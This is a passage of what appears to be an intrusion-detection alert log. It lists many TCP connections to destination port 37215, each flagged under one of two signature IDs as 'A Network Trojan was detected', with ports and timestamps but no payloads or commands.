          SID:2829579
          Source Port:43076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241548
          SID:2835222
          Source Port:60710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169634
          SID:2835222
          Source Port:45570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.595051
          SID:2829579
          Source Port:37368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787174
          SID:2835222
          Source Port:42954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107862
          SID:2835222
          Source Port:44328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020208
          SID:2829579
          Source Port:34154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806281
          SID:2829579
          Source Port:37822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237954
          SID:2835222
          Source Port:36324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708222
          SID:2835222
          Source Port:35156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512009
          SID:2829579
          Source Port:58570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259612
          SID:2829579
          Source Port:45374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112218
          SID:2829579
          Source Port:35458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740773
          SID:2835222
          Source Port:54194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257224
          SID:2835222
          Source Port:35370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444318
          SID:2835222
          Source Port:43994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545647
          SID:2835222
          Source Port:60680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550908
          SID:2835222
          Source Port:46070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269185
          SID:2835222
          Source Port:55308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158746
          SID:2829579
          Source Port:37482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183881
          SID:2835222
          Source Port:35600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175946
          SID:2835222
          Source Port:39896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671196
          SID:2835222
          Source Port:44218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018234
          SID:2835222
          Source Port:46858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512558
          SID:2835222
          Source Port:35890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107881
          SID:2829579
          Source Port:50406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891146
          SID:2835222
          Source Port:58634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070895
          SID:2829579
          Source Port:39246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403979
          SID:2835222
          Source Port:42840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.147688
          SID:2835222
          Source Port:35532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.740910
          SID:2835222
          Source Port:33014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055398
          SID:2829579
          Source Port:45456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894904
          SID:2835222
          Source Port:37864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107452
          SID:2829579
          Source Port:42212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783838
          SID:2829579
          Source Port:45822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548722
          SID:2829579
          Source Port:56832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183966
          SID:2835222
          Source Port:40350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405406
          SID:2835222
          Source Port:37770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057823
          SID:2835222
          Source Port:46994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512561
          SID:2835222
          Source Port:42948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545411
          SID:2829579
          Source Port:41136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599343
          SID:2829579
          Source Port:48998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554481
          SID:2835222
          Source Port:48860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112513
          SID:2829579
          Source Port:42500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.902371
          SID:2835222
          Source Port:48560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468772
          SID:2835222
          Source Port:45252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179919
          SID:2835222
          Source Port:39268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114076
          SID:2835222
          Source Port:57806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178215
          SID:2829579
          Source Port:41434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669712
          SID:2835222
          Source Port:58000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745087
          SID:2835222
          Source Port:36906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708796
          SID:2829579
          Source Port:44022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510383
          SID:2829579
          Source Port:52092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799389
          SID:2829579
          Source Port:54378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788963
          SID:2835222
          Source Port:41932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667665
          SID:2829579
          Source Port:40126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175607
          SID:2835222
          Source Port:54228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352832
          SID:2829579
          Source Port:57346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508847
          SID:2829579
          Source Port:55656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302995
          SID:2835222
          Source Port:48172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446985
          SID:2835222
          Source Port:37760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178259
          SID:2829579
          Source Port:45950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884430
          SID:2835222
          Source Port:39756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461227
          SID:2829579
          Source Port:43348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792897
          SID:2835222
          Source Port:54402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352177
          SID:2835222
          Source Port:37932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511864
          SID:2835222
          Source Port:53454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408291
          SID:2829579
          Source Port:51208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673173
          SID:2835222
          Source Port:45836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410877
          SID:2835222
          Source Port:54150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707575
          SID:2835222
          Source Port:50888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.265926
          SID:2835222
          Source Port:47350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.163187
          SID:2835222
          Source Port:47420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893954
          SID:2835222
          Source Port:51226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178687
          SID:2829579
          Source Port:58192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242150
          SID:2829579
          Source Port:41162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.898124
          SID:2835222
          Source Port:35334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818709
          SID:2835222
          Source Port:32986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884305
          SID:2835222
          Source Port:47240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.496051
          SID:2835222
          Source Port:49248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236112
          SID:2829579
          Source Port:60174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554082
          SID:2829579
          Source Port:54544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.455434
          SID:2835222
          Source Port:57086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787961
          SID:2829579
          Source Port:46000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.099474
          SID:2835222
          Source Port:60898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109282
          SID:2829579
          Source Port:52554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442525
          SID:2835222
          Source Port:37156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039464
          SID:2829579
          Source Port:39958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243003
          SID:2835222
          Source Port:42010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022057
          SID:2829579
          Source Port:41852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467806
          SID:2829579
          Source Port:34280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162730
          SID:2835222
          Source Port:54144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893913
          SID:2829579
          Source Port:33716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110972
          SID:2829579
          Source Port:53846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670030
          SID:2829579
          Source Port:37536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827784
          SID:2829579
          Source Port:49362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405746
          SID:2829579
          Source Port:56296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087272
          SID:2835222
          Source Port:51448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893762
          SID:2829579
          Source Port:45762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126927
          SID:2835222
          Source Port:45634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741342
          SID:2829579
          Source Port:41374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787174
          SID:2835222
          Source Port:51302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174324
          SID:2829579
          Source Port:55084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158673
          SID:2829579
          Source Port:59922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743858
          SID:2835222
          Source Port:59024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132703
          SID:2835222
          Source Port:36810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731264
          SID:2829579
          Source Port:53646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463195
          SID:2829579
          Source Port:45714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782141
          SID:2835222
          Source Port:48450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306260
          SID:2829579
          Source Port:44198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041612
          SID:2835222
          Source Port:51874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742098
          SID:2829579
          Source Port:40904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466515
          SID:2835222
          Source Port:39430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846318
          SID:2829579
          Source Port:36732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044119
          SID:2829579
          Source Port:60984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449083
          SID:2835222
          Source Port:42430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128614
          SID:2835222
          Source Port:46814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173658
          SID:2829579
          Source Port:46012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788268
          SID:2829579
          Source Port:36416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164339
          SID:2835222
          Source Port:39956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603348
          SID:2835222
          Source Port:52262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272363
          SID:2829579
          Source Port:43340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815242
          SID:2829579
          Source Port:38666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860040
          SID:2835222
          Source Port:34582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860824
          SID:2829579
          Source Port:60124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738957
          SID:2835222
          Source Port:44946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351613
          SID:2835222
          Source Port:39372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857505
          SID:2829579
          Source Port:38948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911579
          SID:2835222
          Source Port:50708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896614
          SID:2829579
          Source Port:33934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044844
          SID:2835222
          Source Port:33326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462741
          SID:2829579
          Source Port:59808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549613
          SID:2835222
          Source Port:55320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.265906
          SID:2835222
          Source Port:45046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352441
          SID:2835222
          Source Port:42386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461919
          SID:2829579
          Source Port:46120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108233
          SID:2829579
          Source Port:55980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055159
          SID:2829579
          Source Port:43058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021216
          SID:2829579
          Source Port:36930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463008
          SID:2829579
          Source Port:49332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153628
          SID:2829579
          Source Port:45374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378013
          SID:2829579
          Source Port:56398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844147
          SID:2829579
          Source Port:46954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017733
          SID:2829579
          Source Port:47360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352766
          SID:2829579
          Source Port:56604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895951
          SID:2835222
          Source Port:52770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153145
          SID:2835222
          Source Port:60096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158983
          SID:2835222
          Source Port:40638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159848
          SID:2829579
          Source Port:58936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396334
          SID:2835222
          Source Port:46448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672869
          SID:2835222
          Source Port:60684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811080
          SID:2829579
          Source Port:57742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353193
          SID:2835222
          Source Port:49432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.061834
          SID:2835222
          Source Port:33026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548089
          SID:2835222
          Source Port:51314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743987
          SID:2829579
          Source Port:36196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514340
          SID:2829579
          Source Port:49464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742167
          SID:2829579
          Source Port:54658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188912
          SID:2835222
          Source Port:45802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671677
          SID:2835222
          Source Port:45584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884560
          SID:2835222
          Source Port:50936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463413
          SID:2835222
          Source Port:40152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600713
          SID:2835222
          Source Port:49394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155537
          SID:2829579
          Source Port:40232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191652
          SID:2835222
          Source Port:50378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509747
          SID:2835222
          Source Port:54016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410084
          SID:2835222
          Source Port:49252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108156
          SID:2835222
          Source Port:58716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263730
          SID:2829579
          Source Port:57102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860086
          SID:2835222
          Source Port:48032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241236
          SID:2829579
          Source Port:47268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087495
          SID:2835222
          Source Port:52294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159177
          SID:2835222
          Source Port:55028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892268
          SID:2829579
          Source Port:48546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355248
          SID:2829579
          Source Port:40422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705302
          SID:2829579
          Source Port:58262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.509954
          SID:2835222
          Source Port:55436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514100
          SID:2835222
          Source Port:34054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020304
          SID:2835222
          Source Port:35944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039508
          SID:2829579
          Source Port:48630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668144
          SID:2829579
          Source Port:57396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896516
          SID:2835222
          Source Port:50770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271486
          SID:2829579
          Source Port:52912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792006
          SID:2835222
          Source Port:44306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444564
          SID:2829579
          Source Port:35798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179273
          SID:2829579
          Source Port:39858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786811
          SID:2835222
          Source Port:36872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067858
          SID:2829579
          Source Port:59190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709915
          SID:2835222
          Source Port:44704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787026
          SID:2829579
          Source Port:45126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175462
          SID:2829579
          Source Port:41294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059748
          SID:2829579
          Source Port:59400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356731
          SID:2835222
          Source Port:42196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158339
          SID:2835222
          Source Port:42300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667083
          SID:2829579
          Source Port:50574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600562
          SID:2829579
          Source Port:36980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109224
          SID:2835222
          Source Port:39364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601364
          SID:2829579
          Source Port:60354
          Destination Port:37215
